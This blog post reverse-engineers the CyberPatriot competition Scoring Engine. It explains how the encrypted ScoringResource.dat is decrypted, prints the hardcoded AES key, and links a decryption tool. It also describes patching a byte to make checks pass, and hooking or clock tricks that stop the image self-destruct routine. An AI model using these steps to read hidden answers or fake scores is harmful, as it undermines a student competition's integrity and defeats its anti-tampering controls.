If all you wanted to do is see what the engine accesses, the easiest way would be to hook different Windows API functions such as CreateFileW or RegOpenKeyExA. The reason I wanted to go deeper is that you don't see what they're actually checking, which is the juicy data we want.

Reversing

When the Scoring Engine first starts, it initially registers service control handlers and does generic service status updates. The part we are interested in is when it first initializes.

Before the engine can start scanning for vulnerabilities, it needs to know what to check and where to send the results of the checks to. The interesting part of the Scoring Engine is that this information is stored offline. This means, everything the virtual machine you are using will check is stored on disk and does not require an internet connection. This somewhat surprised me because storing the upload URL and other general information on disk makes sense, but storing what's going to be scored?

After initializing service related classes, the engine instantiates a class that will contain the parsed information from the local scoring data. Local scoring data is stored (encrypted) in a file called "ScoringResource.dat". This file is typically stored in the "C:\CyberPatriot" folder in the virtual machine.

The Scoring Data needs to be decrypted and parsed into the information class. This happens in a function I call "InitializeScoringData". At first, the function can be quite overwhelming due to its size. It turns out, only the first part does the decryption of the Scoring Data, the rest is just parsing through the XML (the Scoring Data is stored in XML format). The beginning of the "InitializeScoringData" function finds the path to the "ScoringResource.dat" file by referencing the path of the current module ("CCSClient.exe", the scoring engine, is in the same folder as the Scoring Data). For encryption and decryption, the Scoring Engine uses the Crypto++ library (version 5.6.2) and uses AES-GCM. After finding the name of the "ScoringResource.dat" file, the engine initializes the CryptContext for decryption.

The function above initializes the cryptographic context that the engine will later use for decryption. I opted to go with a screenshot to show how the AES Key is displayed in IDA Pro. The AES Key Block starts at Context + 0x4 and is 16 bytes. Following endianness, the key ends up being 0xB, 0x50, 0x96, 0x92, 0xCA, 0xC8, 0xCA, 0xDE, 0xC8, 0xCE, 0xF6, 0x76, 0x95, 0xF5, 0x1E, 0x99 starting at the *(_DWORD*)(Context + 4) to the *(_DWORD*)(Context + 0x10).

After initializing the cryptographic context, the Decrypt function will check that the encrypted data file exists and enter a function I call "DecryptData". This function is not only used for decrypting the Scoring Data, but also Scoring Reports.

The "DecryptData" function starts off by reading in the Scoring Data from the "ScoringResource.dat" file using the boost library. It then instantiates a new "CryptoPP::StringSink" and sets the third argument to be the output string. StringSink's are a type of object CryptoPP uses to output to a string. For example, there is also a FileSink if you want to output to a file. The "DecryptData" function then passes on the CryptContext, FileBuffer, FileSize, and the StringSink to a function I call "DecryptBuffer".

The "DecryptBuffer" function first checks that the file is greater than 28 bytes, if it is not, it does not bother decrypting. The function then instantiates a "CryptoPP::BlockCipherFinal" for the AES Class and sets the key and IV. The interesting part is that the IV used for AES Decryption is the first 12 bytes of the file we are trying to decrypt. These bytes are not part of the encrypted content and should be disregarded when decrypting the buffer. If you remember, the key for the AES decryption was specified in the initialize CryptoPP function.

After setting the key and IV used for the AES decryption, the function instantiates a "CryptoPP::ZlibDecompressor". It turns out that the Scoring Data is deflated with Zlib before being encrypted, thus to get the Scoring Data, the data must be inflated again. This Decompressor is attached to the "StreamTransformationFilter" so that after decryption and before the data is put into the OutputString, the data is inflated.

The function starts decrypting by pumping the correct data into different CryptoPP filters. AES-GCM verifies the hash of the file as you decrypt, which is why you'll hear me referring to the "HashVerificationFilter". The "AuthenticatedDecryptionFilter" decrypts and the "StreamTransformationFilter" allows the data to be used in a pipeline.

First, the function inputs the last 16 bytes of the file into the "HashVerificationFilter" and also the IV. Then, it inputs the file contents after the 12th byte into the "AuthenticatedDecryptionFilter" which subsequently pipes it into the "StreamTransformationFilter" which inflates the data on-the-go. If the "HashVerificationFilter" does not throw an error, it returns that the decryption succeeded.

The output buffer now contains the XML Scoring Data. Here is the format it takes:



  
  
  CyberPatriot
  
  
  
  
  true
  
  
  
    
    http://time.is/UTC
    http://nist.time.gov/
    http://www.zulutime.net/
    http://time1.ucla.edu/home.php
    http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime
    http://worldtime.io/current/utc_netherlands/8554
    http://www.timeanddate.com/worldclock/timezone/utc
    http://www.thetimenow.com/utc/coordinated_universal_time
    http://www.worldtimeserver.com/current_time_in_UTC.aspx
  
  
    
    
    
    
    
    
  
  
    
    
    
    
    
    
    
  
  
  
  
  60
  60
  24
  
    C:\CyberPatriot\sox.exe C:\CyberPatriot\gain.wav -d -q
    C:\CyberPatriot\CyberPatriotNotify.exe You Gained Points!
  
  
    C:\CyberPatriot\sox.exe C:\CyberPatriot\alarm.wav -d -q
    C:\CyberPatriot\CyberPatriotNotify.exe You Lost Points.
  
  true
  C:\CyberPatriot
  ScoringConfig
  ScoringReport
  ScoringReportTemplate
  ScoringData/ScoringReport
  tempfile
  
    cmd.exe /c echo Running installation commands
  
   <--! Requirements for VM -->
    C:\CyberPatriot\ScoringResource.dat
    C:\CyberPatriot\CCSClient.exe
    
    
    
    
  
  
    
    
    
    
      
      
      <>> 
    
    
      <>
        
        
      >
    
  
  
    
    
    
    
      
      
      <>> 
    
    
      <>
        
        
      >
    
  
  
    
    ...
  
  
    
    ...

The check XML elements tell you exactly what they check for. I don't have the Scoring Data for this year because I did not participate, but here are some XML Scoring Data files for past years:

2016-2017 CP-IX High School Round 2 Windows 8: Here

2016-2017 CP-IX High School Round 2 Windows 2008: Here

2016-2017 CP-IX HS State Platinum Ubuntu 14: Here

2017-2018 CP-X Windows 7 Training Image: Here

Tool to decrypt

This is probably what a lot of you are looking for, just drag and drop an encrypted "ScoringResource.dat" onto the program, and the decrypted version will be printed. If you don't want to compile your own version, there is a compiled binary in the Releases section.

Github Repo: Here

Continuing reversing

After the function decrypts the buffer of Scoring Data, the "InitializeScoringData" parses through it and fills the information class with the data from the XML. The "InitializeScoringData" is only called once at the beginning of the engine and is not called again.

From then on, until the service receives the STOP message, it constantly checks to see if a team patched a vulnerability. In the routine function, the engine checks if the scoring data was initialized/decrypted, and if it wasn't, decrypts again. This is when the second check is done to see whether or not the image should be destructed. The factors it checks includes checking the time, checking the DestructImage object of the XML Scoring Data, etc.

If the function decides to destruct the image, it is quite amusing what it does...

The first if statement checks whether or not to destruct the image, and if it should destruct, it starts:

Deleting registry keys and the sub keys under them such as "SOFTWARE\\Microsoft\\Windows NT", "SOFTWARE\\Microsoft\\Windows", ""SOFTWARE\\Microsoft", "SOFTWARE\\Policies", etc.
Deleting files in critical system directories such as "C:\\Windows", "C:\\Windows\\System32", etc.
Overwriting the first 200 bytes of your first physical drive with NULL bytes.
Terminating every process running on your system.

As you can see in the image, it strangely repeats these functions over and over again before exiting. I guess they're quite serious when they say don't try to run the client on your machine.

After checking whether or not to destroy a system, it checks to see if the system is shutting down. If it is not, then it enters a while loop which executes the checks from the Scoring Data XML. It does this in a function I call "ExecuteCheck".

The function "ExecuteCheck" essentially loops every pass condition for a check and executes the check instructions (i.e C:\trojan.exe Exists Equals true). I won't get into the nuances of this function, but this is an important note if you want to spoof that the check passed. The check + 0x54 is a byte which indicates whether or not it passed. Set it to 1 and the engine will consider that check to be successful.

After executing every check, the engine calls a function I call "GenerateScoringXML". This function takes in the data from the checks and generates an XML file that will be sent to the scoring server. It loops each check/penalty and checks the check + 0x54 byte to see if it passed. This XML is also stored in encrypted data files under "C:\CyberPatriot\ScoringData\*.dat". Here is what a scoring XML looks like (you can use my decrypt program on these data files too!):



  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  1
  false
  C:\CyberPatriot\ScoringResource.dat
  
  C:\CyberPatriot\CCSClient.exe
  
  
  
  
  
  
  
    
    0
  
  
    
    0
  
  0

After generating the Scoring XML, the program calls a function I call "UploadScores". Initially, this function checks internet connectivity by trying to reach Google, the first CyberPatriot scoring server, and the backup CyberPatriot scoring server. The function uploads the scoring XML to the first available scoring server using curl. This function does integrity checks to see if the score XML is incomplete or if there is proxy interception.

After the scoring XML has been uploaded, the engine updates the "ScoringReport.html" to reflect the current status such as internet connectivity, the points scored, the vulnerabilities found, etc.

Finally, the function ends with updating the README shortcut on the Desktop with the appropriate link specified in the decrypted "ScoringResource.dat" XML and calling "DestructImage" again to see if the image should destruct or not. If you're worried about the image destructing, just hook it and return 0.

Conclusion

In conclusion, the CyberPatriot Scoring Engine is really not that complicated. I hope that this article clears up some of the myths and unknowns associated with the engine and gives you a better picture of how it all works. No doubt CyberPatriot will change how they encrypt/decrypt for next years CyberPatriot, but I am not sure to what extent they will change things.

If you're wondering how I got the "ScoringResource.dat" files from older VM images, there are several methods:

VMWare has an option under File called "Map Virtual Disks". You can give it a VMDK file and it will extract it for you into a disc. You can grab it from the filesystem there.
7-Zip can extract VMDK files.
If you want to run the VM, you can set your system time to be the time the competition was and turn off networking for the VM. No DestructImage :)

Bill Demirkapi's Blog

Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale

Background

Cloud Environments & Network Identifiers

Why Care?

Cloud Environments & Authentication

Why Care?

Past Work

Dangling Domains

Hardcoded Secrets

Shifting Our Perspective

Traditional Discovery Mindset

Should Some Vulnerabilities Be Approached Differently?

The Security at Scale Mindset

Reverse the Process: Dangling Resources

Reverse the Process: Secret Scanning

Scanning Samples?

Technical Implementation

Secret Scanning

Overview

Scanning Millions of Files

Dangling Domains

Key Findings

Metrics

Dangling Domains

Hardcoded Secrets

Case Studies

Samsung Bixby

CrowdStrike

Supreme Court of Nebraska

Beyond Vulnerability Discovery

Piggybacking GitHub

Working With Vendors

Where Do We Go From Here?

Takeaways

How Do I Protect My Organization?

Cloud Providers

Conclusion

Abusing Exceptions for Code Execution, Part 2

Background

Security Cookies

SEH Hijacking and the Mitigations Against It

SafeSEH

SEHOP

64-bit Applications

The Exception Directory

The Exception Dispatching Process

Bypassing Security Cookies

Example

Theory

Are All Compilers Impacted?

SEH Security Cookie Check

MSVC Mitigation

What About Other Compilers?

Clang/LLVM

GCC

Honorable Mentions

Most Applications Use MSVC, Though… Right?

… Microsoft Has Known About This for How Long?

An Alternative to ROP

Background

Unwind Operations

Dumping the Exception Directory of NTDLL

What About CET / Shadow Stacks?

Core Concepts

What Can We Do in RtlDispatchException with Control over the Stack?

What Can We Do in RtlUnwind with Control over the Stack?

Modify Any Register We Want

Influence the Stack Pointer

Summary

Does This Work with CET / Shadow Stacks?

Blast from the Past

Background

An Overpowered Primitive

Planning Our Attack

Allowing Functions to Return Zero

Execute Multiple Exception Handlers Consecutively

What Functions Do We Call?

RtlInitUnicodeStringEx

LdrLoadDll

What Can We Do in `RtlDispatchException` with Control over the Stack?

What Can We Do in `RtlUnwind` with Control over the Stack?